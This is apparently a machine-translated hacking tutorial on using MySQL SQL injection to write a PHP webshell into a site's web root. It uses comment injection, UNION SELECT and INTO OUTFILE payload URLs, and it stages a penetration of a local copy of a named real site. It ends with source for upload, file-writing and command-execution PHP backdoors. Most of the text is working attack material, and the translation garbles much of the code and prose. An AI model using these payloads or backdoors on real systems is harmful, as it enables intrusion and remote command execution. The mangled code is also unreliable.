The biggest limitation is here--insert data, so we can only start from the existing function of the program, in fact, many programs can submit comments, messages, posts, etc., on the program is how to insert variables into the database. In fact, the road is around us, on our own to open up.
Needless to say, first look at a simple example of a local test to create a table that is structured as follows:
CREATE TABLE ' article ' (
' ArticleID ' INT not NULL auto_increment,
' title ' VARCHAR not NULL,
' Content ' TEXT not NULL,
' Visible ' INT DEFAULT ' 1 ' not NULL,
PRIMARY KEY (' ArticleID ')
);
Browse the article's file show.php as follows:
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
Mysql_connect ($servername, $dbusername, $dbpassword) or Die ("database connection failed");
$sql = "SELECT * from article WHERE articleid= $id and visible=1";
$result = Mysql_db_query ($dbname, $sql);
$row = Mysql_fetch_array ($result);
if (! $row) {
echo "The record does not exist";
echo "<p>sql Query: $sql <p>";
Exit
}
function Html_clean ($content) {
$content = Htmlspecialchars ($content);
$content = Str_replace ("\ n", "<br>", $content);
$content = Str_replace ("", "", $content);
$content = Str_replace ("T", "", $content);
return $content;
}
echo "<title>". $row [' title ']. " </title> ";
echo "<b> title:</b>". Htmlspecialchars ($row [' title ']). " echo "<b> content:</b><p>". Html_clean ($row [' content ']). " </p>echo "SQL Query: $sql";
?>
The documents submitted by visitors are add.php as follows:
?
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
Mysql_connect ($servername, $dbusername, $dbpassword) or Die ("database connection failed");
if ($_post[' action ']== "add") {
if ($title = = "" or $content = = "") {
echo "You haven't filled out the form yet." ";
Exit
} else {
$sql = "INSERT into article (title,content,visible) VALUES (' $title ', ' $content ', ' 0 ')";
If the visible field is 1, the text is displayed.
Since it is submitted by the visitor, it must be inserted in 0, admin audit after update to 1.
Mysql_db_query ($dbname, $sql);
Mysql_close ();
echo "You have completed your submission and are awaiting administrator approval." ";
Exit
}
}
?>
<form action= "add.php" method= "POST" >
Article title: <br><input name= "title" type= "text" size= "" Maxlength= "><p>"
Article content: <br><textarea name= "Content" cols= "rows=" ></textarea><p>
<input type= "hidden" name= "action" value= "add" ><input "submit" type= "submitted" >
</form>
Many programs are directly to the user's data into the database, need to call when the function to deal with, like the show.php above. This gives us a chance, that is, our Webshell is written in the database, very few procedures are to be processed before inserting into the database, VBB are directly placed.
We visit add.php to submit our code into the article content, at this time the article is hidden, how do we know the ID of that article? It's actually very simple:
http://127.0.0.1/injection/show.php?id=2
# This is to browse the normal article, if the article does not show, when there will be a hint does not exist.
http://127.0.0.1/injection/show.php?id=2/*
# so that you can comment out the visible field, you can display the hidden article.
Pay attention to the picture in SQL query where as long as we comment out the following judgement, we can change the ID to find our article, just now we are submitting the complete code, this code is a small upload I wrote a backdoor, you can upload any type of file to the script in the directory, But the size cannot exceed the setting in php.ini.
Now that the code has been written, now began to construct our into outfile statement, as long as the construction is correct, our export file will obediently lie in the predetermined directory, as to how to find the Web absolute path, how to find a directory with writable permissions, not in this article discussion scope, I believe these also difficult to everyone. Submit:
http://127.0.0.1/injection/show.php?id=2 into outfile ' f:/www/1.php '/*
Returns the following prompt:
Did you see that? The SQL statement is correct, and despite the error prompts, the file must have been exported as long as the directory exists and is writable:
The back door we uploaded was also normal because the PHP code was not compromised. To step back, even if the quotation marks in the form are corrupted, we can construct the form locally.
Instance
I believe you see here has been a bit of understanding and thinking by injecting Webshell. The above is one of the simplest and most smooth examples. Seemingly harsh conditions, the actual everywhere, seemingly simple, the actual use of space is very large, if flexible use, harm is not small, the following look at a more practical example, can be seen as a complete penetration test.
Since I can not surf the internet now, I will build a local and http://www.4ngel.net site to infiltrate, all the databases and files are the same as the Internet, articles and forums share a database, are I backed up the day before yesterday. I have now removed the code for $ID filtering in the showarticle.php file. The formation of a vulnerable site (a bit wronged, 55555).
Note: The current environment is MAGIC_QUOTES_GPC = off, some programs do the input of the variable processing, such as VBB, so the GPC open or close does not matter.
The whole site did not submit articles, messages, comments, we can not submit our code from the site, fortunately, there is a forum, oh, a lot of places can be submitted to our data, posts, signatures, and so on, we will Webshell code written in the signature.
Then we can through the article page injection point across the table to query the content of the signature, and then exported, with Webshell, even if there is safe_mode blocking, but we have to penetrate the server, is basically no problem. Look at the 5th picture above to know, the article query is 5 fields, we now use Union union query, about union query in my "SQL injection with MySQL" has made it very clear, here no longer elaborated. In our query after union, we also specify 5 fields "1,1,1,1,1", Angel users in the user table, UserID 1, and if the construction is correct, the user exists. The page will return normally:
Http://127.0.0.1/showarticle.php?id=25 ' Union select 1,1,1,1,1 from user where userid=1/*
We see if we can really query the content of the forum's signature, just see the error of the SQL statement, know that the query article content of the field is the 5th, signed field name is "signature", we replace the 5th 1 "signature", and then give the preceding $ ID Specifies a value that does not exist, so that the contents of the signature can be displayed where the content of the article was originally displayed. Structure:
Http://127.0.0.1/showarticle.php?id=55 ' Union select 1,1,1,1,signature from user where userid=1/*
Well, the query is successful, start to export it, my local web directory is f:/www, this I know, oh, as for the actual use of the time, how to get the Web absolute path, do not ask me.
Followed by the statement we constructed just now, add into outfile at the back, and submit:
Http://127.0.0.1/showarticle.php?id=55 ' Union select 1,1,1,1,signature from user where userid=1 into outfile ' f:/www/ Angel.php ' *
Well, there was an error, no matter what, anyway we have no construction errors, and my F-disk is fully controlled by everyone. Naturally our angel.php also came out:
Seemingly complex things, in fact, is a good easy to grasp, the most important is flexibility, the program code, plus PHP features, the use of a variety of ways, but one thing to note is that if you want to export data, single quotes must not be broken, may come from the program code, may come from the Magic_ QUOTES_GPC, as long as single quotes are broken, the success rate is almost zero.
Please do not use the Security Angel site to practicing, since this article is my writing, my site will not exist this problem.
Postscript
I hope this article can play a good effect, other deeper technology, rely on our own to explore, if this article has any errors or omissions in this article where there is no understanding of the place, you can go to the Forum of Security Angel and I exchange. Attached below are some of my written and often used PHP back door, because at that time just learning PHP, the following code may be a lot of problems, if you want to use more powerful PHP back door. It is recommended to download the Phpspy I developed.
PHP Upload type back door
<?php
Codz by Angel action= "" method= "POST" >
<input name= "MyFile" type= "File" >
<input value= "submitted" type= "Submit" ></form>
PHP file Generation type Backdoor
<?php
Codz by Angel) {
$fp = @fopen ("". $_post[' filename '). "", "WB");
$content = $_post[' filedate '];
$FW = @fwrite ($fp, $content);
if ($FW) {
echo <b> Congratulations, write the file successfully! </b><a href= "http://www.hack58.net/Article/html/3/7/2008/. $PHP _self." > Return </a> ";
Exit
} else {
Echo <b> failed to write to file, is it a permission issue? </b><a href= "http://www.hack58.net/Article/html/3/7/2008/. $PHP _self." > Return </a> ";
Exit
}
@fclose ($FP);
}
?>
<form action= "" method= "POST" >
Saved file names (such as: <font color= "#FF0000" >angel.php</font>):<br>
<input type= "text" name= "filename" size= ">"
<p>
File security: <br><?=str_replace (' \ \ ', '/', dirname (__file__))?>
<p>
File contents:
<br><textarea name= "Filedate" cols= "a" rows= "ten" ></textarea><br>
<input type= "hidden" name= "action" value= "create" ><input type= "Submit" value= "Save" >
</form>
<b> Note: When the same file exists, it will completely overwrite its contents! </b>
Execute command-back door
<?php
Codz by Angel method= "POST" >
Command:<br>
<input type= "text" name= "command" size= "a" <?php if ($command) {echo "value=\" $command \ "";}?>> <input na Me= "SUBMIT_BTN" type= "Submit" value= "executive" ></p>
Execution Results:<br>
<textarea cols= "rows=" Readonly><?phpif ($command) {System ($command); ></textarea><p>
Note: There may be restrictions on the Windows host part of the command </form>
